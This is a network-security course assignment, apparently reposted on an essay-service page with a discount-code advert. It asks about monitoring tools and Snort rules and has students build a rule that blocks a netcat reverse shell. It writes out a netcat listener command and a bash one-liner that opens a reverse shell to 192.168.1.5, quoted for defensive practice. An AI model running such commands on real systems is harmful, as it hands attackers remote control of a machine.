Describe how you can use Snorby, Squil and Squert for network and host security monitoring. List any two similar tools that you can use for the same purpose. Discuss two differences between Squil and Squert.
Describe why and how you would process your pcap files with Snort. List two snort rule examples, provide their syntax and describe what they do.
In the “Signature detection and Remote Shells” lab, you used netcat to set up a listener on the Kali machine and executed bash client side code to return a reverse shell. Netcat can be used to set up bind shells and reverse shells. What is the difference between bind and reverse shells? Describe how an organization can prevent bind and reverse shell attacks and the different methods used to prevent bind shell attacks as compared to reverse shell attacks.
As a part of this question you will create a Snort rule that would block content based on the non-case sensitive ASCII string “pport@ST. This will block the remote listener and log in the IPS when an attacker attempts to spawn a remote shell using these commands:
nc -lvp 8
bash –i >& /dev/tcp/192.168.1.5/8 0>&1
You will submit a 750 words report that is clear, concise, and organized.
The report will include and describe at least the following screenshots:
When the remote listener is unblocked and listening.
The new snort rule.
Test the run the new snort rule
Show that the listener is being blocked
Show contents of the log file.
Place this order or similar order and get an amazing discount. USE Discount code “GET20” for 20% discount